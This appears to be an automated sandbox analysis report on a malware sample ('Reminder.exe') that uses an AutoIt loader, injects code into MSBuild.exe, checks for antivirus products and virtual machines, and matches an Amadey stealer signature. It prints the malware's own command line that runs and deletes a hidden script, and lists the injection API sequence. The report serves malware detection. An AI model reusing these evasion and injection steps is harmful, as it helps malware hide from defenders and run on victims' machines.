Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368	Thread sleep count: 1106 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368	Thread sleep time: -33180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2640	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3368	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_0073E180
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_0074A187
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_0074A2E4
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	35_2_0074A66E
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074686D FindFirstFileW,FindNextFileW,FindClose,	35_2_0074686D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073E9BA GetFileAttributesW,FindFirstFileW,FindClose,	35_2_0073E9BA
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_007474F0 FindFirstFileW,FindClose,	35_2_007474F0
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00747591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	35_2_00747591
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_0073DE32
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A3ECD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	35_2_014A3ECD
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A17FD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	35_2_014A17FD
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014A3FD5 FindFirstFileA,GetLastError,	35_2_014A3FD5
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00CEA187
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00CDE180
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00CEA2E4
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00CEA66E
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE686D FindFirstFileW,FindNextFileW,FindClose,	38_2_00CE686D
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDE9BA GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00CDE9BA
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE74F0 FindFirstFileW,FindClose,	38_2_00CE74F0
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	38_2_00CE7591
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00CDDE32
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01653765 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	38_2_01653765
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01651095 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	38_2_01651095
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_0165386D FindFirstFileA,GetLastError,	38_2_0165386D

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_006E310D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: AutoIt3.exe, 0000002A.00000002.2498679993.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000002.2238957940.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238485419.000000000143C000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2233287021.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000026.00000002.2409569799.000000000164A000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2409643770.000000000169A000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.0000000001685000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001474000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001479000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_014B2CBF LdrInitializeThunk,

35_2_014B2CBF

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0074F607 BlockInput,

35_2_0074F607

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

35_2_006E2D33

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_006E310D

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F4BF4 mov eax, dword ptr fs:[00000030h]	35_2_006F4BF4
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h]	35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h]	35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h]	35_2_014B89A2
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h]	35_2_014B89A2
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B2ABD mov eax, dword ptr fs:[00000030h]	35_2_014B2ABD
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014C4916 mov eax, dword ptr fs:[00000030h]	35_2_014C4916
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C94BF4 mov eax, dword ptr fs:[00000030h]	38_2_00C94BF4
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01662355 mov eax, dword ptr fs:[00000030h]	38_2_01662355
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01668241 mov eax, dword ptr fs:[00000030h]	38_2_01668241
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01668241 mov eax, dword ptr fs:[00000030h]	38_2_01668241
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_0166823A mov eax, dword ptr fs:[00000030h]	38_2_0166823A
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_0166823A mov eax, dword ptr fs:[00000030h]	38_2_0166823A
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_016741AE mov eax, dword ptr fs:[00000030h]	38_2_016741AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00444A1B mov eax, dword ptr fs:[00000030h]	41_2_00444A1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0044CC02 mov eax, dword ptr fs:[00000030h]	41_2_0044CC02

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_007320BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

35_2_007320BE

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00702446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_00702446
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F0E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_006F0E4D
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F0F9F SetUnhandledExceptionFilter,	35_2_006F0F9F
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F11EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	35_2_006F11EE
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CA2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00CA2446
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C90E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00C90E4D
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C90F9F SetUnhandledExceptionFilter,	38_2_00C90F9F
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00C911EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0042B08D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_0042B08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0042A60E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_0042A60E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00445700 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_00445700

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Memory protected: page readonly | page read and write | page write copy | page execute | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 41_2_004080D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

41_2_004080D0

Source: C:\Users\user\AppData\Local\friend\Updater.exe

35_2_0073230F

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

35_2_006E2D33

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0073C078 SendInput,keybd_event,

35_2_0073C078

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00752E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

35_2_00752E89

Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00731C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

35_2_00731C68

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00732777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

35_2_00732777

Source: Updater.exe, 0000001C.00000000.1722348560.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000495E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe, AutoIt3.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006F0CA4 cpuid

35_2_006F0CA4

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	35_2_014A19D5
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: GetLocaleInfoA,	35_2_014A22F9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: GetLocaleInfoA,	35_2_014A6959
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: GetLocaleInfoA,	35_2_014A69A5
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	35_2_014A1ADF
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: GetLocaleInfoA,GetACP,	35_2_014A7EF1
Source: C:\edgheaa\AutoIt3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	38_2_0165126D
Source: C:\edgheaa\AutoIt3.exe	Code function: GetLocaleInfoA,	38_2_016561F1
Source: C:\edgheaa\AutoIt3.exe	Code function: GetLocaleInfoA,	38_2_0165623D
Source: C:\edgheaa\AutoIt3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	38_2_01651377
Source: C:\edgheaa\AutoIt3.exe	Code function: GetLocaleInfoA,GetACP,	38_2_01657789
Source: C:\edgheaa\AutoIt3.exe	Code function: GetLocaleInfoA,	38_2_01651B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	41_2_0044F013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	41_2_004585E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	41_2_00458597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	41_2_0045867D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	41_2_00458708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	41_2_0045895B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	41_2_0044EAF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	41_2_00458A81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	41_2_00458B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	41_2_00458C56

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\edgheaa\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00748C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

35_2_00748C58

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_007159C7 GetUserNameW,

35_2_007159C7

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0070B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

35_2_0070B99F

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_006E310D

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: find.exe, 00000013.00000002.1714878841.000001BBC6920000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1714766876.000001BBC663B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Source: C:\edgheaa\AutoIt3.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\edgheaa\AutoIt3.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 35.2.Updater.exe.4292be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.AutoIt3.exe.44e2be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.AutoIt3.exe.4382be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.AutoIt3.exe.44e2be0.1.unpack, type: UNPACKEDPE
